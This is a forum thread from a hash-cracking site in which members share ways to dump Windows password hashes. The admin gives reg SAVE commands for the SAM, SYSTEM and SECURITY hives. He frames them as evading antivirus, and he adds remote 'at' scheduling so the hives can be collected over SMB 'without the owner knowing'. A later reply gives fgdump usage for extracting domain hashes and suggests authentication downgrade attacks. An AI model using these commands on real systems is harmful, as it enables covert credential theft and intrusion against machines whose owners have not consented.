NOTE: When cracking WPA/WPA2 passwords, make sure you check gpuhash.me first incase it's already been processed.

Home - General Discussion - Manually save SAM SYSTEM registry hives

WARNING!
Due to the number of SCAMS going on in the PAID forum, PLEASE ask an ADMIN or MODERATOR to verify ALL found passwords to ensure you are not being SCAMMED.
DO NOT PAY until an ADMIN or MOD has verified them for you!


9 Results - Page 1 of 1 -
1
Author Message
Avatar
blandyuk
Admin / Owner
Status: Trusted
Joined: Tue, 05 Jul 2011
Posts: 3036
Team: HashKiller
Reputation: 4061 Reputation
Offline
Wed, 12 Oct 2011 @ 10:21:26

Been wanting to know how to do this for ages, without using pwdump OR SAMInside OR Cain & Able etc. Here is how it's done:

You need to use a user who is in the "Administrators" group OR you can create a Schedule Task and run it as the "SYSTEM" user and run the following from cmd.exe

reg SAVE HKLM\SAM [drive]:\sam.hive
reg SAVE HKLM\SYSTEM [drive]:\system.hive

Once done, use whatever, SAM Inside, Cain & Able, to load hashes and crack em.

Q). Why would you want to do this way?
A). Most server Anti-Virus programs are locked out even thou your in the "Administrators" group, meaning your nice "pwdump" programs will get removed instantly. This way does mean you can get the 2 hives, without the AV software interferring


Please read the forum rules | Please read the paid section rules
I accept private hash lists, with forum donations only.
BTC: 15qF9WUeFUD63ishxyAMiEgGqTcYzk4j9b
GPU Power: 9x GTX 1070 + 4x GTX 1080

Avatar
blandyuk
Admin / Owner
Status: Trusted
Joined: Tue, 05 Jul 2011
Posts: 3036
Team: HashKiller
Reputation: 4061 Reputation
Offline
Wed, 12 Oct 2011 @ 10:22:19

Update on this, to get the Domain Cache logins:

reg SAVE HKLM\SECURITY [drive]:\security.hive
reg SAVE HKLM\SYSTEM [drive]:\system.hive

With WinXP, you'll get "Access Denied" on the HKLM\SECURITY hive, to get round this, type this in at command-line:

at 15:00 reg SAVE HKLM\SECURITY [drive]:\security.hive

Note: the 15:00 is the time, please change as neccessary. This will create a windows schedule and use the [machine]\SYSTEM user to run it which has access. You can also run this remotely on another machine as long as you have local administrator access. Simply run:

at \\[machine] 15:00 reg SAVE HKLM\SECURITY [drive]:\security.hive

This will save the reg files locally on the \\[machine]] so you can simply SMB on and get them without the owner knowing.


Please read the forum rules | Please read the paid section rules
I accept private hash lists, with forum donations only.
BTC: 15qF9WUeFUD63ishxyAMiEgGqTcYzk4j9b
GPU Power: 9x GTX 1070 + 4x GTX 1080

Avatar
Hash-IT

Status: Trusted
Joined: Tue, 02 Aug 2011
Posts: 4598
Team: HashKiller
Reputation: 3003 Reputation
Offline
Mon, 23 Jan 2012 @ 16:47:44

Thank you for posting this Blandy it’s useful stuff !

XP Pro

I have managed to crack my own computer using the method where I copy the files from my local running C drive.

C:\WINDOWS\system32\config\SAM
C:\WINDOWS\system32\config\SYSTEM


Server 2003.

In another test I loaded a server up, (Server 2003) and performed the same as above. However I noticed that I only have my own administrator user name and password in the SAM + SYSTEM files and not the “test” user I had made on the domain.

Do you know how I can do this when I physically have the drive on my desk ? I would like to be able to copy all usernames and password hashes from a slave drive (ghost image of the actual server C drive) connected to my computer.

Separate question.
Would I be able to do this via a LAN connection also ? I have the Administrator password obviously as it is my domain, but I wondered if it is possible to copy all domain user names and password hashes with or without using remote desktop from a computer on the LAN ?

Thank you very much.

Normal 0 false false false MicrosoftInternetExplorer4


Please read the forum rules. | Please read the paid section rules.

BTC: 1MmWESN5bKZ1YSuHrm5uNwnQYxWyQnEQ6E

Avatar
blandyuk
Admin / Owner
Status: Trusted
Joined: Tue, 05 Jul 2011
Posts: 3036
Team: HashKiller
Reputation: 4061 Reputation
Offline
Mon, 23 Jan 2012 @ 17:21:50

You cannot get a full list of Active Directory users on a Domain this way, only way is to either do a pwdump on the shared drive on the domain network OR crack the Domain Cache Cred logins on a computer that is used by users, (Windows stores the last 10 domain users and passwords as DCC hashes).

-
edited by blandyuk on 07/01/2013


Please read the forum rules | Please read the paid section rules
I accept private hash lists, with forum donations only.
BTC: 15qF9WUeFUD63ishxyAMiEgGqTcYzk4j9b
GPU Power: 9x GTX 1070 + 4x GTX 1080

Avatar
Hash-IT

Status: Trusted
Joined: Tue, 02 Aug 2011
Posts: 4598
Team: HashKiller
Reputation: 3003 Reputation
Offline
Mon, 23 Jan 2012 @ 17:37:15

Thank you for taking the time to write back, I am sorry I don’t understand.

Are you saying that I cannot extract the domain usernames and password hashes directly from a verbatim copy of my server C drive connected to my computer as a slave drive ?

Surly server has to store the details somewhere ?

Thanks.


Please read the forum rules. | Please read the paid section rules.

BTC: 1MmWESN5bKZ1YSuHrm5uNwnQYxWyQnEQ6E

Avatar
hasheponge

Status: Elite
Joined: Fri, 16 Dec 2011
Posts: 1671
Team:
Reputation: 1128 Reputation
Offline
Mon, 23 Jan 2012 @ 18:18:46

Hash-IT said:

Thank you for taking the time to write back, I am sorry I don’t understand.

Are you saying that I cannot extract the domain usernames and password hashes directly from a verbatim copy of my server C drive connected to my computer as a slave drive ?

Surly server has to store the details somewhere ?

Thanks.

You can only extract "cache persistent" (if GPO of domain AD is ok) in your server, but full list of Active Directory users not easy.... use a sniffing and try downgrade to LM&NTLMv1 authentification is possible...


Specs -
Nvidia 660 Ti - 470 GTX - Radeon 6950

Avatar
Hash-IT

Status: Trusted
Joined: Tue, 02 Aug 2011
Posts: 4598
Team: HashKiller
Reputation: 3003 Reputation
Offline
Mon, 23 Jan 2012 @ 18:30:00

Thanks hasheponge for your help.

I am amazed that this is not possible, I wonder where the usernames and hashes are stored then if not on the C drive of the server !

If I boot this copy of the C drive up in a different computer I can log in as admin and see all the users there. I am completely baffled ! Ha ha !

Is it all locked down and encrypted or something when server 2003 shuts down ?


Please read the forum rules. | Please read the paid section rules.

BTC: 1MmWESN5bKZ1YSuHrm5uNwnQYxWyQnEQ6E

Avatar
hasheponge

Status: Elite
Joined: Fri, 16 Dec 2011
Posts: 1671
Team:
Reputation: 1128 Reputation
Offline
Tue, 24 Jan 2012 @ 10:27:44

Hash-IT said:

Thanks hasheponge for your help.

I am amazed that this is not possible, I wonder where the usernames and hashes are stored then if not on the C drive of the server ! ==> in database on DC (domain controler) see : http://en.wikipedia.org/wiki/Active_Directory#Database

If I boot this copy of the C drive up in a different computer I can log in as admin and see all the users there. I am completely baffled ! Ha ha ! ==> lol ;-)

Is it all locked down and encrypted or something when server 2003 shuts down ?


For Attack AD 2003 see :

0 - But you must login with admin domain...

1 - download fgdump


2 - execute :

fgdump.exe -h ServerAD -u AdminDomain -p passadmindomain

3 - then you extract a file : ServerAD.pwdump ==> Hash is MD5 inside this file...

Code:
4 - Try to crack ;-)

<em>edited by hasheponge on 24/01/2012</em>


Specs -
Nvidia 660 Ti - 470 GTX - Radeon 6950

Avatar
Hash-IT

Status: Trusted
Joined: Tue, 02 Aug 2011
Posts: 4598
Team: HashKiller
Reputation: 3003 Reputation
Offline
Tue, 24 Jan 2012 @ 22:28:57

Thanks hasheponge

I got reading that link you kindly supplied me and the program also and completly lost track of time. So I haven't long to write just now but I just wanted to say thank you for posting and setting me off in the right direction !

I will most likely come back later !! Ha ha !


Please read the forum rules. | Please read the paid section rules.

BTC: 1MmWESN5bKZ1YSuHrm5uNwnQYxWyQnEQ6E


9 Results - Page 1 of 1 -
1

We have a total of 163692 messages in 20542 topics.
We have a total of 19308 registered users.
Our newest registered member is WeeJobbieMilzo.